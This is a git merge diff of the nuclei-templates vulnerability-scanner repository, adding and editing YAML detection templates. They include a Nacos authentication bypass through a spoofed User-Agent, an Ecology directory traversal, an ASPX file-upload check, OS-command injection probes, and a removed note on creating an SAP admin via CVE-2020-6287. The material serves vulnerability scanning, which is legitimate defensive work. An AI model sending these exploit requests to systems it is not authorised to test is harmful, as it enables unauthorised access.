Merge branch 'master' of https://github.com/projectdiscovery/nuclei-templates
commit
07c2e79fb9
|
@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc
|
||||||
|
|
||||||
| Templates | Counts | Templates | Counts | Templates | Counts |
|
| Templates | Counts | Templates | Counts | Templates | Counts |
|
||||||
| ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- |
|
| ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- |
|
||||||
| cves | 305 | vulnerabilities | 145 | exposed-panels | 124 |
|
| cves | 306 | vulnerabilities | 147 | exposed-panels | 124 |
|
||||||
| takeovers | 68 | exposures | 91 | technologies | 66 |
|
| takeovers | 68 | exposures | 92 | technologies | 66 |
|
||||||
| misconfiguration | 57 | workflows | 30 | miscellaneous | 20 |
|
| misconfiguration | 56 | workflows | 30 | miscellaneous | 20 |
|
||||||
| default-logins | 24 | exposed-tokens | 0 | dns | 8 |
|
| default-logins | 24 | exposed-tokens | 0 | dns | 8 |
|
||||||
| fuzzing | 8 | helpers | 8 | iot | 11 |
|
| fuzzing | 8 | helpers | 8 | iot | 11 |
|
||||||
|
|
||||||
**102 directories, 1049 files**.
|
**103 directories, 1054 files**.
|
||||||
|
|
||||||
</td>
|
</td>
|
||||||
</tr>
|
</tr>
|
||||||
|
|
|
@ -68,7 +68,7 @@ requests:
|
||||||
- "not found in <b>([/a-z_]+)wp"
|
- "not found in <b>([/a-z_]+)wp"
|
||||||
|
|
||||||
req-condition: true
|
req-condition: true
|
||||||
matchers-condition: or
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
|
||||||
- type: word
|
- type: word
|
||||||
|
|
|
@ -12,16 +12,6 @@ info:
|
||||||
- https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=552599675
|
- https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=552599675
|
||||||
- https://www.onapsis.com/recon-sap-cyber-security-vulnerability
|
- https://www.onapsis.com/recon-sap-cyber-security-vulnerability
|
||||||
|
|
||||||
# Affected Versions: 7.30, 7.31, 7.40, 7.50
|
|
||||||
|
|
||||||
# p.s:
|
|
||||||
# > Don't forget to change the default credentials
|
|
||||||
# > to create new admin in associated file:
|
|
||||||
# > `payloads/CVE-2020-6287.xml`
|
|
||||||
|
|
||||||
# Ref:
|
|
||||||
# - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6287
|
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- payloads:
|
- payloads:
|
||||||
data: helpers/payloads/CVE-2020-6287.xml
|
data: helpers/payloads/CVE-2020-6287.xml
|
||||||
|
@ -42,3 +32,8 @@ requests:
|
||||||
- type: status
|
- type: status
|
||||||
status:
|
status:
|
||||||
- 200
|
- 200
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "text/xml"
|
||||||
|
part: header
|
|
@ -15,7 +15,6 @@ requests:
|
||||||
command:
|
command:
|
||||||
- "systeminfo" # Windows
|
- "systeminfo" # Windows
|
||||||
- "lsb_release -a" # Linux
|
- "lsb_release -a" # Linux
|
||||||
- "sysctl kern.ostype" # macOS
|
|
||||||
|
|
||||||
attack: sniper
|
attack: sniper
|
||||||
raw:
|
raw:
|
||||||
|
@ -40,16 +39,15 @@ requests:
|
||||||
regex:
|
regex:
|
||||||
- "OS Name:.*Microsoft Windows"
|
- "OS Name:.*Microsoft Windows"
|
||||||
- "Distributor ID:"
|
- "Distributor ID:"
|
||||||
- "kern\\.ostype"
|
|
||||||
condition: or
|
condition: or
|
||||||
part: body
|
part: body
|
||||||
- type: status
|
- type: status
|
||||||
status:
|
status:
|
||||||
- 200
|
- 200
|
||||||
|
|
||||||
extractors:
|
extractors:
|
||||||
- type: regex
|
- type: regex
|
||||||
part: body
|
part: body
|
||||||
regex:
|
regex:
|
||||||
- "Microsoft Windows (.*)"
|
- "Microsoft Windows (.*)"
|
||||||
- "kern\\.ostype: (.*)"
|
|
||||||
- "Distributor ID: (.*)"
|
- "Distributor ID: (.*)"
|
|
@ -34,3 +34,8 @@ requests:
|
||||||
- type: status
|
- type: status
|
||||||
status:
|
status:
|
||||||
- 200
|
- 200
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "text/html"
|
||||||
|
part: header
|
|
@ -0,0 +1,49 @@
|
||||||
|
id: CVE-2021-29441
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Nacos prior to 1.4.1 Authentication Bypass
|
||||||
|
description: |
|
||||||
|
This template only works on Nuclei engine prior to version 2.3.3 and version >= 2.3.5.
|
||||||
|
|
||||||
|
In Nacos before version 1.4.1, when configured to use authentication (-Dnacos.core.auth.enabled=true)
|
||||||
|
Nacos uses the AuthFilter servlet filter to enforce authentication. This filter has a backdoor that
|
||||||
|
enables Nacos servers to bypass this filter and therefore skip authentication checks.
|
||||||
|
This mechanism relies on the user-agent HTTP header so it can be easily spoofed.
|
||||||
|
This issue may allow any user to carry out any administrative tasks on the Nacos server.
|
||||||
|
author: dwisiswant0
|
||||||
|
severity: high
|
||||||
|
reference: https://securitylab.github.com/advisories/GHSL-2020-325_326-nacos/
|
||||||
|
tags: nacos,auth-bypass,cve,cve2021
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
POST /nacos/v1/cs/configs?dataId=nacos.cfg.dataIdfoo&group=foo&content=helloWorld HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Accept: */*
|
||||||
|
|
||||||
|
- |
|
||||||
|
POST /nacos/v1/cs/configs?dataId=nacos.cfg.dataIdfoo&group=foo&content=helloWorld HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Accept: */*
|
||||||
|
User-Agent: Nacos-Server
|
||||||
|
|
||||||
|
req-condition: true
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- "status_code_1 == 403"
|
||||||
|
- "status_code_2 == 200"
|
||||||
|
condition: and
|
||||||
|
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- "contains(body_1, 'Forbidden')"
|
||||||
|
- "contains(body_2, 'true')"
|
||||||
|
condition: and
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "application/json"
|
||||||
|
part: header
|
|
@ -0,0 +1,25 @@
|
||||||
|
id: gogs-install-exposure
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Gogs install exposure
|
||||||
|
author: dhiyaneshDk
|
||||||
|
severity: high
|
||||||
|
tags: gogs,exposure
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- '{{BaseURL}}/install'
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "General Settings"
|
||||||
|
- "Database Settings"
|
||||||
|
part: body
|
||||||
|
condition: and
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -21,5 +21,6 @@ requests:
|
||||||
- type: word
|
- type: word
|
||||||
words:
|
words:
|
||||||
- '{{randstr}}'
|
- '{{randstr}}'
|
||||||
- 'suggestions'
|
- '"results":'
|
||||||
|
- '"suggestions":'
|
||||||
condition: and
|
condition: and
|
||||||
|
|
|
@ -4,7 +4,7 @@ info:
|
||||||
name: Nginx Status Page
|
name: Nginx Status Page
|
||||||
author: dhiyaneshDK
|
author: dhiyaneshDK
|
||||||
severity: low
|
severity: low
|
||||||
tags: config,nginx
|
tags: misconfig,nginx
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
|
@ -0,0 +1,25 @@
|
||||||
|
id: nginx-vhost-traffic-status
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Nginx Vhost Traffic Status
|
||||||
|
author: geeknik
|
||||||
|
reference: https://github.com/vozlt/nginx-module-vts
|
||||||
|
severity: low
|
||||||
|
tags: status,nginx,misconfig
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/status"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "Nginx Vhost Traffic Status"
|
||||||
|
- "Host"
|
||||||
|
- "Zone"
|
||||||
|
condition: and
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -16,10 +16,10 @@ requests:
|
||||||
- type: regex
|
- type: regex
|
||||||
part: header
|
part: header
|
||||||
regex:
|
regex:
|
||||||
- kong+
|
- "[Ss]erver: [Kk]ong+"
|
||||||
|
|
||||||
extractors:
|
extractors:
|
||||||
- type: regex
|
- type: kval
|
||||||
part: header
|
part: header
|
||||||
regex:
|
kval:
|
||||||
- .*kong.*
|
- server
|
||||||
|
|
|
@ -0,0 +1,20 @@
|
||||||
|
id: ecology-filedownload-directory-traversal
|
||||||
|
info:
|
||||||
|
name: Ecology Directory Traversal
|
||||||
|
author: princechaddha
|
||||||
|
severity: medium
|
||||||
|
tags: ecology,lfi
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/weaver/ln.FileDownload?fpath=../ecology/WEB-INF/web.xml"
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "<url-pattern>/weaver/"
|
||||||
|
part: body
|
|
@ -0,0 +1,32 @@
|
||||||
|
id: gloo-unauth
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Unauthenticated Gloo UI
|
||||||
|
author: dhiyaneshDk
|
||||||
|
severity: high
|
||||||
|
tags: unauth,gloo
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- '{{BaseURL}}/fed.rpc.solo.io.GlooInstanceApi/ListClusterDetails'
|
||||||
|
headers:
|
||||||
|
User-Agent: "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55"
|
||||||
|
Content-type: "application/grpc-web+proto"
|
||||||
|
Referer: "{{BaseURL}}/admin/"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "gke-remote"
|
||||||
|
part: body
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "application/grpc-web+proto"
|
||||||
|
part: header
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -21,7 +21,7 @@ requests:
|
||||||
Content-Disposition: form-data; name="file1"; filename="poc.aspx"
|
Content-Disposition: form-data; name="file1"; filename="poc.aspx"
|
||||||
Content-Type: image/jpeg
|
Content-Type: image/jpeg
|
||||||
|
|
||||||
Poc_Test
|
{{randstr}}
|
||||||
-----------------------------20873900192357278038549710136--
|
-----------------------------20873900192357278038549710136--
|
||||||
|
|
||||||
- |
|
- |
|
||||||
|
@ -38,7 +38,8 @@ requests:
|
||||||
regex:
|
regex:
|
||||||
- "(.*?.ASPX)"
|
- "(.*?.ASPX)"
|
||||||
|
|
||||||
|
req-condition: true
|
||||||
matchers:
|
matchers:
|
||||||
- type: dsl
|
- type: dsl
|
||||||
dsl:
|
dsl:
|
||||||
- "contains(body, 'Poc_Test') && status_code == 200"
|
- "contains(body_2, '{{randstr}}') && status_code_2 == 200"
|
Loading…
Reference in New Issue